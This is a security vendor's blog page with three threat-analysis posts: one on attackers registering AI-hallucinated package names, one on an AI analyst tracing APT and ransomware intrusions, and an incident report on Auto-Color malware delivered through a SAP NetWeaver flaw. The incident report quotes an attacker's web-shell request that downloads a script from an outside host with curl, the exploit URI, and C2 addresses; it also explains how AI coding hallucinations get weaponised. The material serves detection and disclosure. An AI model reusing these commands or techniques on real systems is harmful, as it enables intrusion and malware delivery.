Blog
/
/
October 30, 2023

Exploring AI Threats: Package Hallucination Attacks

Learn how malicious actors exploit errors in generative AI tools to launch packet attacks. Read how Darktrace products detect and prevent these threats!
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Charlotte Thompson
Cyber Analyst
Written by
Tiana Kelly
Deputy Team Lead, London & Cyber Analyst
Default blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog image
30
Oct 2023

AI tools open doors for threat actors

On November 30, 2022, the free conversational language generation model ChatGPT was launched by OpenAI, an artificial intelligence (AI) research and development company. The launch of ChatGPT was the culmination of development ongoing since 2018 and represented the latest innovation in the ongoing generative AI boom and made the use of generative AI tools accessible to the general population for the first time.

ChatGPT is estimated to currently have at least 100 million users, and in August 2023 the site reached 1.43 billion visits [1]. Darktrace data indicated that, as of March 2023, 74% of active customer environments have employees using generative AI tools in the workplace [2].

However, with new tools come new opportunities for threat actors to exploit and use them maliciously, expanding their arsenal.

Much consideration has been given to mitigating the impacts of the increased linguistic complexity in social engineering and phishing attacks resulting from generative AI tool use, with Darktrace observing a 135% increase in ‘novel social engineering attacks’ across thousands of active Darktrace/Email™ customers from January to February 2023, corresponding with the widespread adoption of ChatGPT and its peers [3].

Less overall consideration, however, has been given to impacts stemming from errors intrinsic to generative AI tools. One of these errors is AI hallucinations.

What is an AI hallucination?

AI “hallucination” is a term which refers to the predictive elements of generative AI and LLMs’ AI model gives an unexpected or factually incorrect response which does not align with its machine learning training data [4]. This differs from regular and intended behavior for an AI model, which should provide a response based on the data it was trained upon.  

Why are AI hallucinations a problem?

Despite the term indicating it might be a rare phenomenon, hallucinations are far more likely than accurate or factual results as the AI models used in LLMs are merely predictive and focus on the most probable text or outcome, rather than factual accuracy.

Given the widespread use of generative AI tools in the workplace employees are becoming significantly more likely to encounter an AI hallucination. Furthermore, if these fabricated hallucination responses are taken at face value, they could cause significant issues for an organization.

Use of generative AI in software development

Software developers may use generative AI for recommendations on how to optimize their scripts or code, or to find packages to import into their code for various uses. Software developers may ask LLMs for recommendations on specific pieces of code or how to solve a specific problem, which will likely lead to a third-party package. It is possible that packages recommended by generative AI tools could represent AI hallucinations and the packages may not have been published, or, more accurately, the packages may not have been published prior to the date at which the training data for the model halts. If these hallucinations result in common suggestions of a non-existent package, and the developer copies the code snippet wholesale, this may leave the exchanges vulnerable to attack.

Research conducted by Vulcan revealed the prevalence of AI hallucinations when ChatGPT is asked questions related to coding. After sourcing a sample of commonly asked coding questions from Stack Overflow, a question-and-answer website for programmers, researchers queried ChatGPT (in the context of Node.js and Python) and reviewed its responses. In 20% of the responses provided by ChatGPT pertaining to Node.js at least one un-published package was included, whilst the figure sat at around 35% for Python [4].

Hallucinations can be unpredictable, but would-be attackers are able to find packages to create by asking generative AI tools generic questions and checking whether the suggested packages exist already. As such, attacks using this vector are unlikely to target specific organizations, instead posing more of a widespread threat to users of generative AI tools.

Malicious packages as attack vectors

Although AI hallucinations can be unpredictable, and responses given by generative AI tools may not always be consistent, malicious actors are able to discover AI hallucinations by adopting the approach used by Vulcan. This allows hallucinated packages to be used as attack vectors. Once a malicious actor has discovered a hallucination of an un-published package, they are able to create a package with the same name and include a malicious payload, before publishing it. This is known as a malicious package.

Malicious packages could also be recommended by generative AI tools in the form of pre-existing packages. A user may be recommended a package that had previously been confirmed to contain malicious content, or a package that is no longer maintained and, therefore, is more vulnerable to hijack by malicious actors.

In such scenarios it is not necessary to manipulate the training data (data poisoning) to achieve the desired outcome for the malicious actor, thus a complex and time-consuming attack phase can easily be bypassed.

An unsuspecting software developer may incorporate a malicious package into their code, rendering it harmful. Deployment of this code could then result in compromise and escalation into a full-blown cyber-attack.

Figure 1: Flow diagram depicting the initial stages of an AI Package Hallucination Attack.

For providers of Software-as-a-Service (SaaS) products, this attack vector may represent an even greater risk. Such organizations may have a higher proportion of employed software developers than other organizations of comparable size. A threat actor, therefore, could utilize this attack vector as part of a supply chain attack, whereby a malicious payload becomes incorporated into trusted software and is then distributed to multiple customers. This type of attack could have severe consequences including data loss, the downtime of critical systems, and reputational damage.

How could Darktrace detect an AI Package Hallucination Attack?

In June 2023, Darktrace introduced a range of DETECT™ and RESPOND™ models designed to identify the use of generative AI tools within customer environments, and to autonomously perform inhibitive actions in response to such detections. These models will trigger based on connections to endpoints associated with generative AI tools, as such, Darktrace’s detection of an AI Package Hallucination Attack would likely begin with the breaching of one of the following DETECT models:

  • Compliance / Anomalous Upload to Generative AI
  • Compliance / Beaconing to Rare Generative AI and Generative AI
  • Compliance / Generative AI

Should generative AI tool use not be permitted by an organization, the Darktrace RESPOND model ‘Antigena / Network / Compliance / Antigena Generative AI Block’ can be activated to autonomously block connections to endpoints associated with generative AI, thus preventing an AI Package Hallucination attack before it can take hold.

Once a malicious package has been recommended, it may be downloaded from GitHub, a platform and cloud-based service used to store and manage code. Darktrace DETECT is able to identify when a device has performed a download from an open-source repository such as GitHub using the following models:

  • Device / Anomalous GitHub Download
  • Device / Anomalous Script Download Followed By Additional Packages

Whatever goal the malicious package has been designed to fulfil will determine the next stages of the attack. Due to their highly flexible nature, AI package hallucinations could be used as an attack vector to deliver a large variety of different malware types.

As GitHub is a commonly used service by software developers and IT professionals alike, traditional security tools may not alert customer security teams to such GitHub downloads, meaning malicious downloads may go undetected. Darktrace’s anomaly-based approach to threat detection, however, enables it to recognize subtle deviations in a device’s pre-established pattern of life which may be indicative of an emerging attack.

Subsequent anomalous activity representing the possible progression of the kill chain as part of an AI Package Hallucination Attack could then trigger an Enhanced Monitoring model. Enhanced Monitoring models are high-fidelity indicators of potential malicious activity that are investigated by the Darktrace analyst team as part of the Proactive Threat Notification (PTN) service offered by the Darktrace Security Operation Center (SOC).

Conclusion

Employees are often considered the first line of defense in cyber security; this is particularly true in the face of an AI Package Hallucination Attack.

As the use of generative AI becomes more accessible and an increasingly prevalent tool in an attacker’s toolbox, organizations will benefit from implementing company-wide policies to define expectations surrounding the use of such tools. It is simple, yet critical, for example, for employees to fact check responses provided to them by generative AI tools. All packages recommended by generative AI should also be checked by reviewing non-generated data from either external third-party or internal sources. It is also good practice to adopt caution when downloading packages with very few downloads as it could indicate the package is untrustworthy or malicious.

As of September 2023, ChatGPT Plus and Enterprise users were able to use the tool to browse the internet, expanding the data ChatGPT can access beyond the previous training data cut-off of September 2021 [5]. This feature will be expanded to all users soon [6]. ChatGPT providing up-to-date responses could prompt the evolution of this attack vector, allowing attackers to publish malicious packages which could subsequently be recommended by ChatGPT.

It is inevitable that a greater embrace of AI tools in the workplace will be seen in the coming years as the AI technology advances and existing tools become less novel and more familiar. By fighting fire with fire, using AI technology to identify AI usage, Darktrace is uniquely placed to detect and take preventative action against malicious actors capitalizing on the AI boom.

Credit to Charlotte Thompson, Cyber Analyst, Tiana Kelly, Analyst Team Lead, London, Cyber Analyst

References

[1] https://seo.ai/blog/chatgpt-user-statistics-facts

[2] https://darktrace.com/news/darktrace-addresses-generative-ai-concerns

[3] https://darktrace.com/news/darktrace-email-defends-organizations-against-evolving-cyber-threat-landscape

[4] https://vulcan.io/blog/ai-hallucinations-package-risk?nab=1&utm_referrer=https%3A%2F%2Fwww.google.com%2F

[5] https://twitter.com/OpenAI/status/1707077710047216095

[6] https://www.reuters.com/technology/openai-says-chatgpt-can-now-browse-internet-2023-09-27/

Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Charlotte Thompson
Cyber Analyst
Written by
Tiana Kelly
Deputy Team Lead, London & Cyber Analyst

More in this series

No items found.

Blog

/

/

August 1, 2025

Darktrace's Cyber AI Analyst in Action: 4 Real-World Investigations into Advanced Threat Actors

Man looking at computer doing work, cybersecurity, AI, AI analystDefault blog imageDefault blog image

From automation to intelligence

There’s a lot of attention around AI in cybersecurity right now, similar to how important automation felt about 15 years ago. But this time, the scale and speed of change feel different.

In the context of cybersecurity investigations, the application of AI can significantly enhance an organization's ability to detect, respond to, and recover from incidents. It enables a more proactive approach to cybersecurity, ensuring a swift and effective response to potential threats.

At Darktrace, we’ve learned that no single AI technique can solve cybersecurity on its own. We employ a multi-layered AI approach, strategically integrating a diverse set of techniques both sequentially and hierarchically. This layered architecture allows us to deliver proactive, adaptive defense tailored to each organization’s unique environment.

Darktrace uses a range of AI techniques to perform in-depth analysis and investigation of anomalies identified by lower-level alerts, in particular automating Levels 1 and 2 of the Security Operations Centre (SOC) team’s workflow. This saves teams time and resources by automating repetitive and time-consuming tasks carried out during investigation workflows. We call this core capability Cyber AI Analyst.

How Darktrace’s Cyber AITM Analyst works

Cyber AI Analyst mimics the way a human carries out a threat investigation: evaluating multiple hypotheses, analyzing logs for involved assets, and correlating findings across multiple domains. It will then generate an alert with full technical details, pulling relevant findings into a single pane of glass to track the entire attack chain.

Learn more about how Cyber AI Analyst accomplishes this here:

This blog will highlight four examples where Darktrace’s agentic AI, Cyber AI Analyst, successfully identified the activity of sophisticated threat actors, including nation state adversaries. The final example will include step-by-step details of the investigations conducted by Cyber AI Analyst.

[related-resource]

Case 1: Cyber AI Analyst vs. ShadowPad Malware: East Asian Advanced Persistent Threat (APT)

In March 2025, Darktrace detailed a lengthy investigation into two separate threads of likely state-linked intrusion activity in a customer network, showcasing Cyber AI Analyst’s ability to identify different activity threads and piece them together.

The first of these threads...

occurred in July 2024 and involved a malicious actor establishing a foothold in the customer’s virtual private network (VPN) environment, likely via the exploitation of an information disclosure vulnerability (CVE-2024-24919) affecting Check Point Security Gateway devices.

Using compromised service account credentials, the actor then moved laterally across the network via RDP and SMB, with files related to the modular backdoor ShadowPad being delivered to targeted internal systems. Targeted systems went on to communicate with a C2 server via both HTTPS connections and DNS tunnelling.

The second thread of activity...

Which occurred several months earlier in October 2024, involved a malicious actor infiltrating the customer's desktop environment via SMB and WMI.

The actor used these compromised desktops to discriminately collect sensitive data from a network share before exfiltrating such data to a web of likely compromised websites.

For each of these threads of activity, Cyber AI Analyst was able to identify and piece together the relevant intrusion steps by hypothesizing, analyzing, and then generating a singular view of the full attack chain.

Cyber AI Analyst identifying and piecing together the various steps of the ShadowPad intrusion activity.
Figure 1: Cyber AI Analyst identifying and piecing together the various steps of the ShadowPad intrusion activity.
Cyber AI Analyst Incident identifying and piecing together the various steps of the data theft activity.
Figure 2: Cyber AI Analyst Incident identifying and piecing together the various steps of the data theft activity.

These Cyber AI Analyst investigations enabled a quicker understanding of the threat actor’s sequence of events and, in some cases, led to faster containment.

Read the full detailed blog on Darktrace’s ShadowPad investigation here!

Case 2: Cyber AI Analyst vs. Blind Eagle: South American APT

Since 2018, APT-C-36, also known as Blind Eagle, has been observed performing cyber-attacks targeting various sectors across multiple countries in Latin America, with a particular focus on Colombia.

In February 2025, Cyber AI Analyst provided strong coverage of a Blind Eagle intrusion targeting a South America-based public transport provider, identifying and correlating various stages of the attack, including tooling.

Cyber AI Analyst investigation linking likely Remcos C2 traffic, a suspicious file download, and eventual data exfiltration.Type image caption here (optional)
Figure 3: Cyber AI Analyst investigation linking likely Remcos C2 traffic, a suspicious file download, and eventual data exfiltration.Type image caption here (optional)
Cyber AI Analyst identifying unusual data uploads to another likely Remcos C2 endpoint and correlated each of the individual detections involved in this compromise, identifying them as part of a broader incident that encompassed C2 connectivity, suspicious downloads, and external data transfers.
Figure 4: Cyber AI Analyst identifying unusual data uploads to another likely Remcos C2 endpoint and correlated each of the individual detections involved in this compromise, identifying them as part of a broader incident that encompassed C2 connectivity, suspicious downloads, and external data transfers.

In this campaign, threat actors have been observed using phishing emails to deliver malicious URL links to targeted recipients, similar to the way threat actors have previously been observed exploiting CVE-2024-43451, a vulnerability in Microsoft Windows that allows the disclosure of a user’s NTLMv2 password hash upon minimal interaction with a malicious file [4].

In late February 2025, Darktrace observed activity assessed with medium confidence to be associated with Blind Eagle on the network of a customer in Colombia. Darktrace observed a device on the customer’s network being directed over HTTP to a rare external IP, namely 62[.]60[.]226[.]112, which had never previously been seen in this customer’s environment and was geolocated in Germany.

Read the full Blind Eagle threat story here!

Case 3: Cyber AI Analyst vs. Ransomware Gang

In mid-March 2025, a malicious actor gained access to a customer’s network through their VPN. Using the credential 'tfsservice', the actor conducted network reconnaissance, before leveraging the Zerologon vulnerability and the Directory Replication Service to obtain credentials for the high-privilege accounts, ‘_svc_generic’ and ‘administrator’.

The actor then abused these account credentials to pivot over RDP to internal servers, such as DCs. Targeted systems showed signs of using various tools, including the remote monitoring and management (RMM) tool AnyDesk, the proxy tool SystemBC, the data compression tool WinRAR, and the data transfer tool WinSCP.

The actor finally collected and exfiltrated several gigabytes of data to the cloud storage services, MEGA, Backblaze, and LimeWire, before returning to attempt ransomware detonation.

Figure 5: Cyber AI Analyst detailing its full investigation, linking 34 related Incident Events in a single pane of glass.

Cyber AI Analyst identified, analyzed, and reported on all corners of this attack, resulting in a threat tray made up of 34 Incident Events into a singular view of the attack chain.

Cyber AI Analyst identified activity associated with the following tactics across the MITRE attack chain:

  • Initial Access
  • Persistence
  • Privilege Escalation
  • Credential Access
  • Discovery
  • Lateral Movement
  • Execution
  • Command and Control
  • Exfiltration

Case 4: Cyber AI Analyst vs Ransomhub

Cyber AI Analyst presenting its full investigation into RansomHub, correlating 38 Incident Events.
Figure 6: Cyber AI Analyst presenting its full investigation into RansomHub, correlating 38 Incident Events.

A malicious actor appeared to have entered the customer’s network their VPN, using a likely attacker-controlled device named 'DESKTOP-QIDRDSI'. The actor then pivoted to other systems via RDP and distributed payloads over SMB.

Some systems targeted by the attacker went on to exfiltrate data to the likely ReliableSite Bare Metal server, 104.194.10[.]170, via HTTP POSTs over port 5000. Others executed RansomHub ransomware, as evidenced by their SMB-based distribution of ransom notes named 'README_b2a830.txt' and their addition of the extension '.b2a830' to the names of files in network shares.

Through its live investigation of this attack, Cyber AI Analyst created and reported on 38 Incident Events that formed part of a single, wider incident, providing a full picture of the threat actor’s behavior and tactics, techniques, and procedures (TTPs). It identified activity associated with the following tactics across the MITRE attack chain:

  • Execution
  • Discovery
  • Lateral Movement
  • Collection
  • Command and Control
  • Exfiltration
  • Impact (i.e., encryption)
Step-by-step details of one of the network scanning investigations performed by Cyber AI Analyst in response to an anomaly alerted by Darktrace.
Figure 7: Step-by-step details of one of the network scanning investigations performed by Cyber AI Analyst in response to an anomaly alerted by Darktrace.
Step-by-step details of one of the administrative connectivity investigations performed by Cyber AI Analyst in response to an anomaly alerted by Darktrace.
Figure 8: Step-by-step details of one of the administrative connectivity investigations performed by Cyber AI Analyst in response to an anomaly alerted by Darktrace.
 Step-by-step details of one of the external data transfer investigations performed by Cyber AI Analyst in response to an anomaly alerted by Darktrace. Step-by-step details of one of the external data transfer investigations performed by Cyber AI Analyst in response to an anomaly alerted by Darktrace.
Figure 9: Step-by-step details of one of the external data transfer investigations performed by Cyber AI Analyst in response to an anomaly alerted by Darktrace.
Step-by-step details of one of the data collection and exfiltration investigations performed by Cyber AI Analyst in response to an anomaly alerted by Darktrace.
Figure 10: Step-by-step details of one of the data collection and exfiltration investigations performed by Cyber AI Analyst in response to an anomaly alerted by Darktrace.
Step-by-step details of one of the ransomware encryption investigations performed by Cyber AI Analyst in response to an anomaly alerted by Darktrace.
Figure 11: Step-by-step details of one of the ransomware encryption investigations performed by Cyber AI Analyst in response to an anomaly alerted by Darktrace.

Conclusion

Security teams are challenged to keep up with a rapidly evolving cyber-threat landscape, now powered by AI in the hands of attackers, alongside the growing scope and complexity of digital infrastructure across the enterprise.

Traditional security methods, even those that use some simple machine learning, are no longer sufficient, as these tools cannot keep pace with all possible attack vectors or respond quickly enough machine-speed attacks, given their complexity compared to known and expected patterns. Security teams require a step up in their detection capabilities, leveraging machine learning to understand the environment, filter out the noise, and take action where threats are identified. This is where Cyber AI Analyst steps in to help.

Credit to Nathaniel Jones (VP, Security & AI Strategy, FCISO), Sam Lister (Security Researcher), Emma Foulger (Global Threat Research Operations Lead), and Ryan Traill (Analyst Content Lead)

[related-resource]

Continue reading
About the author

Blog

/

Network

/

July 30, 2025

Auto-Color Backdoor: How Darktrace Thwarted a Stealthy Linux Intrusion

Default blog imageDefault blog image

In April 2025, Darktrace identified an Auto-Color backdoor malware attack taking place on the network of a US-based chemicals company.

Over the course of three days, a threat actor gained access to the customer’s network, attempted to download several suspicious files and communicated with malicious infrastructure linked to Auto-Color malware.

After Darktrace successfully blocked the malicious activity and contained the attack, the Darktrace Threat Research team conducted a deeper investigation into the malware.

They discovered that the threat actor had exploited CVE-2025-31324 to deploy Auto-Color as part of a multi-stage attack — the first observed pairing of SAP NetWeaver exploitation with the Auto-Color malware.

Furthermore, Darktrace’s investigation revealed that Auto-Color is now employing suppression tactics to cover its tracks and evade detection when it is unable to complete its kill chain.

What is CVE-2025-31324?

On April 24, 2025, the software provider SAP SE disclosed a critical vulnerability in its SAP Netweaver product, namely CVE-2025-31324. The exploitation of this vulnerability would enable malicious actors to upload files to the SAP Netweaver application server, potentially leading to remote code execution and full system compromise. Despite the urgent disclosure of this CVE, the vulnerability has been exploited on several systems [1]. More information on CVE-2025-31324 can be found in our previous discussion.

What is Auto-Color Backdoor Malware?

The Auto-Color backdoor malware, named after its ability to rename itself to “/var/log/cross/auto-color” after execution, was first observed in the wild in November 2024 and is categorized as a Remote Access Trojan (RAT).

Auto-Colour has primarily been observed targeting universities and government institutions in the US and Asia [2].

What does Auto-Color Backdoor Malware do?

It is known to target Linux systems by exploiting built-in system features like ld.so.preload, making it highly evasive and dangerous, specifically aiming for persistent system compromise through shared object injection.

Each instance uses a unique file and hash, due to its statically compiled and encrypted command-and-control (C2) configuration, which embeds data at creation rather than retrieving it dynamically at runtime. The behavior of the malware varies based on the privilege level of the user executing it and the system configuration it encounters.

How does Auto-Color work?

The malware’s process begins with a privilege check; if the malware is executed without root privileges, it skips the library implant phase and continues with limited functionality, avoiding actions that require system-level access, such as library installation and preload configuration, opting instead to maintain minimal activity while continuing to attempt C2 communication. This demonstrates adaptive behavior and an effort to reduce detection when running in restricted environments.

If run as root, the malware performs a more invasive installation, installing a malicious shared object, namely **libcext.so.2**, masquerading as a legitimate C utility library, a tactic used to blend in with trusted system components. It uses dynamic linker functions like dladdr() to locate the base system library path; if this fails, it defaults to /lib.

Gaining persistence through preload manipulation

To ensure persistence, Auto-Color modifies or creates /etc/ld.so.preload, inserting a reference to the malicious library. This is a powerful Linux persistence technique as libraries listed in this file are loaded before any others when running dynamically linked executables, meaning Auto-Color gains the ability to silently hook and override standard system functions across nearly all applications.

Once complete, the ELF binary copies and renames itself to “**/var/log/cross/auto-color**”, placing the implant in a hidden directory that resembles system logs. It then writes the malicious shared object to the base library path.

A delayed payload activated by outbound communication

To complete its chain, Auto-Color attempts to establish an outbound TLS connection to a hardcoded IP over port 443. This enables the malware to receive commands or payloads from its operator via API requests [2].

Interestingly, Darktrace found that Auto-Color suppresses most of its malicious behavior if this connection fails - an evasion tactic commonly employed by advanced threat actors. This ensures that in air-gapped or sandboxed environments, security analysts may be unable to observe or analyze the malware’s full capabilities.

If the C2 server is unreachable, Auto-Color effectively stalls and refrains from deploying its full malicious functionality, appearing benign to analysts. This behavior prevents reverse engineering efforts from uncovering its payloads, credential harvesting mechanisms, or persistence techniques.

In real-world environments, this means the most dangerous components of the malware only activate when the attacker is ready, remaining dormant during analysis or detonation, and thereby evading detection.

Darktrace’s coverage of the Auto-Color malware

Initial alert to Darktrace’s SOC

On April 28, 2025, Darktrace’s Security Operations Centre (SOC) received an alert for a suspicious ELF file downloaded on an internet-facing device likely running SAP Netweaver. ELF files are executable files specific to Linux, and in this case, the unexpected download of one strongly indicated a compromise, marking the delivery of the Auto-Color malware.

Figure 1: A timeline breaking down the stages of the attack

Early signs of unusual activity detected by Darktrace

While the first signs of unusual activity were detected on April 25, with several incoming connections using URIs containing /developmentserver/metadatauploader, potentially scanning for the CVE-2025-31324 vulnerability, active exploitation did not begin until two days later.

Initial compromise via ZIP file download followed by DNS tunnelling requests

In the early hours of April 27, Darktrace detected an incoming connection from the malicious IP address 91.193.19[.]109[.] 6.

The telltale sign of CVE-2025-31324 exploitation was the presence of the URI ‘/developmentserver/metadatauploader?CONTENTTYPE=MODEL&CLIENT=1’, combined with a ZIP file download.

The device immediately made a DNS request for the Out-of-Band Application Security Testing (OAST) domain aaaaaaaaaaaa[.]d06oojugfd4n58p4tj201hmy54tnq4rak[.]oast[.]me.

OAST is commonly used by threat actors to test for exploitable vulnerabilities, but it can also be leveraged to tunnel data out of a network via DNS requests.

Darktrace’s Autonomous Response capability quickly intervened, enforcing a “pattern of life” on the offending device for 30 minutes. This ensured the device could not deviate from its expected behavior or connections, while still allowing it to carry out normal business operations.

Figure 2: Alerts from the device’s Model Alert Log showing possible DNS tunnelling requests to ‘request bin’ services.
Figure 3: Darktrace’s Autonomous Response enforcing a “pattern of life” on the compromised device following a suspicious tunnelling connection.

Continued malicious activity

The device continued to receive incoming connections with URIs containing ‘/developmentserver/metadatauploader’. In total seven files were downloaded (see filenames in Appendix).

Around 10 hours later, the device made a DNS request for ‘ocr-freespace.oss-cn-beijing.aliyuncs[.]com’.

In the same second, it also received a connection from 23.186.200[.]173 with the URI ‘/irj/helper.jsp?cmd=curl -O hxxps://ocr-freespace.oss-cn-beijing.aliyuncs[.]com/2025/config.sh’, which downloaded a shell script named config.sh.

Execution

This script was executed via the helper.jsp file, which had been downloaded during the initial exploit, a technique also observed in similar SAP Netweaver exploits [4].

Darktrace subsequently observed the device making DNS and SSL connections to the same endpoint, with another inbound connection from 23.186.200[.]173 and the same URI observed again just ten minutes later.

The device then went on to make several connections to 47.97.42[.]177 over port 3232, an endpoint associated with Supershell, a C2 platform linked to backdoors and commonly deployed by China-affiliated threat groups [5].

Less than 12 hours later, and just 24 hours after the initial exploit, the attacker downloaded an ELF file from http://146.70.41.178:4444/logs, which marked the delivery of the Auto-Color malware.

Figure 4: Darktrace’s detection of unusual outbound connections and the subsequent file download from http://146.70.41.178:4444/logs, as identified by Cyber AI Analyst.

A deeper investigation into the attack

Darktrace’s findings indicate that CVE-2025-31324 was leveraged in this instance to launch a second-stage attack, involving the compromise of the internet-facing device and the download of an ELF file representing the Auto-Color malware—an approach that has also been observed in other cases of SAP NetWeaver exploitation [4].

Darktrace identified the activity as highly suspicious, triggering multiple alerts that prompted triage and further investigation by the SOC as part of the Darktrace Managed Detection and Response (MDR) service.

During this investigation, Darktrace analysts opted to extend all previously applied Autonomous Response actions for an additional 24 hours, providing the customer’s security team time to investigate and remediate.

Figure 5: Cyber AI Analyst’s investigation into the unusual connection attempts from the device to the C2 endpoint.

At the host level, the malware began by assessing its privilege level; in this case, it likely detected root access and proceeded without restraint. Following this, the malware began the chain of events to establish and maintain persistence on the device, ultimately culminating an outbound connection attempt to its hardcoded C2 server.

Figure 6: Cyber AI Analyst’s investigation into the unusual connection attempts from the device to the C2 endpoint.

Over a six-hour period, Darktrace detected numerous attempted connections to the endpoint 146.70.41[.]178 over port 443. In response, Darktrace’s Autonomous Response swiftly intervened to block these malicious connections.

Given that Auto-Color relies heavily on C2 connectivity to complete its execution and uses shared object preloading to hijack core functions without modifying existing binaries, the absence of a successful connection to its C2 infrastructure (in this case, 146.70.41[.]178) causes the malware to sleep before trying to reconnect.

While Darktrace’s analysis was limited by the absence of a live C2, prior research into its command structure reveals that Auto-Color supports a modular C2 protocol. This includes reverse shell initiation (0x100), file creation and execution tasks (0x2xx), system proxy configuration (0x300), and global payload manipulation (0x4XX). Additionally, core command IDs such as 0,1, 2, 4, and 0xF cover basic system profiling and even include a kill switch that can trigger self-removal of the malware [2]. This layered command set reinforces the malware’s flexibility and its dependence on live operator control.

Thanks to the timely intervention of Darktrace’s SOC team, who extended the Autonomous Response actions as part of the MDR service, the malicious connections remained blocked. This proactive prevented the malware from escalating, buying the customer’s security team valuable time to address the threat.

Conclusion

Ultimately, this incident highlights the critical importance of addressing high-severity vulnerabilities, as they can rapidly lead to more persistent and damaging threats within an organization’s network. Vulnerabilities like CVE-2025-31324 continue to be exploited by threat actors to gain access to and compromise internet-facing systems. In this instance, the download of Auto-Color malware was just one of many potential malicious actions the threat actor could have initiated.

From initial intrusion to the failed establishment of C2 communication, the Auto-Color malware showed a clear understanding of Linux internals and demonstrated calculated restraint designed to minimize exposure and reduce the risk of detection. However, Darktrace’s ability to detect this anomalous activity, and to respond both autonomously and through its MDR offering, ensured that the threat was contained. This rapid response gave the customer’s internal security team the time needed to investigate and remediate, ultimately preventing the attack from escalating further.

Credit to Harriet Rayner (Cyber Analyst), Owen Finn (Cyber Analyst), Tara Gould (Threat Research Lead) and Ryan Traill (Analyst Content Lead)

Appendices

MITRE ATT&CK Mapping

Malware - RESOURCE DEVELOPMENT - T1588.001

Drive-by Compromise - INITIAL ACCESS - T1189

Data Obfuscation - COMMAND AND CONTROL - T1001

Non-Standard Port - COMMAND AND CONTROL - T1571

Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol - EXFILTRATION - T1048.003

Masquerading - DEFENSE EVASION - T1036

Application Layer Protocol - COMMAND AND CONTROL - T1071

Unix Shell – EXECUTION - T1059.004

LC_LOAD_DYLIB Addition – PERSISTANCE - T1546.006

Match Legitimate Resource Name or Location – DEFENSE EVASION - T1036.005

Web Protocols – COMMAND AND CONTROL - T1071.001

Indicators of Compromise (IoCs)

Filenames downloaded:

  • exploit.properties
  • helper.jsp
  • 0KIF8.jsp
  • cmd.jsp
  • test.txt
  • uid.jsp
  • vregrewfsf.jsp

Auto-Color sample:

  • 270fc72074c697ba5921f7b61a6128b968ca6ccbf8906645e796cfc3072d4c43 (sha256)

IP Addresses

  • 146[.]70[.]19[.]122
  • 149[.]78[.]184[.]215
  • 196[.]251[.]85[.]31
  • 120[.]231[.]21[.]8
  • 148[.]135[.]80[.]109
  • 45[.]32[.]126[.]94
  • 110[.]42[.]42[.]64
  • 119[.]187[.]23[.]132
  • 18[.]166[.]61[.]47
  • 183[.]2[.]62[.]199
  • 188[.]166[.]87[.]88
  • 31[.]222[.]254[.]27
  • 91[.]193[.]19[.]109
  • 123[.]146[.]1[.]140
  • 139[.]59[.]143[.]102
  • 155[.]94[.]199[.]59
  • 165[.]227[.]173[.]41
  • 193[.]149[.]129[.]31
  • 202[.]189[.]7[.]77
  • 209[.]38[.]208[.]202
  • 31[.]222[.]254[.]45
  • 58[.]19[.]11[.]97
  • 64[.]227[.]32[.]66

Darktrace Model Detections

Compromise / Possible Tunnelling to Bin Services

Anomalous Server Activity / New User Agent from Internet Facing System

Anomalous File / Incoming ELF File

Anomalous Connection / Application Protocol on Uncommon Port

Anomalous Connection / New User Agent to IP Without Hostname

Experimental / Mismatched MIME Type From Rare Endpoint V4

Compromise / High Volume of Connections with Beacon Score

Device / Initial Attack Chain Activity

Device / Internet Facing Device with High Priority Alert

Compromise / Large Number of Suspicious Failed Connections

Model Alerts for CVE

Compromise / Possible Tunnelling to Bin Services

Compromise / High Priority Tunnelling to Bin Services

Autonomous Response Model Alerts

Antigena / Network::External Threat::Antigena Suspicious File Block

Antigena / Network::External Threat::Antigena File then New Outbound Block

Antigena / Network::Significant Anomaly::Antigena Controlled and Model Alert

Experimental / Antigena File then New Outbound Block

Antigena / Network::External Threat::Antigena Suspicious Activity Block

Antigena / Network::Significant Anomaly::Antigena Alerts Over Time Block

Antigena / Network::Significant Anomaly::Antigena Enhanced Monitoring from Client Block

Antigena / Network::Significant Anomaly::Antigena Enhanced Monitoring from Client Block

Antigena / Network::Significant Anomaly::Antigena Alerts Over Time Block

Antigena / MDR::Model Alert on MDR-Actioned Device

Antigena / Network::Significant Anomaly::Antigena Enhanced Monitoring from Client Block

References

1. [Online] https://onapsis.com/blog/active-exploitation-of-sap-vulnerability-cve-2025-31324/.

2. https://unit42.paloaltonetworks.com/new-linux-backdoor-auto-color/. [Online]

3. [Online] (https://www.darktrace.com/blog/tracking-cve-2025-31324-darktraces-detection-of-sap-netweaver-exploitation-before-and-after-disclosure#:~:text=June%2016%2C%202025-,Tracking%20CVE%2D2025%2D31324%3A%20Darktrace's%20detection%20of%20SAP%20Netweaver,guidance%.

4. [Online] https://unit42.paloaltonetworks.com/threat-brief-sap-netweaver-cve-2025-31324/.

5. [Online] https://www.forescout.com/blog/threat-analysis-sap-vulnerability-exploited-in-the-wild-by-chinese-threat-actor/.

Continue reading
About the author
Your data. Our AI.
Elevate your network security with Darktrace AI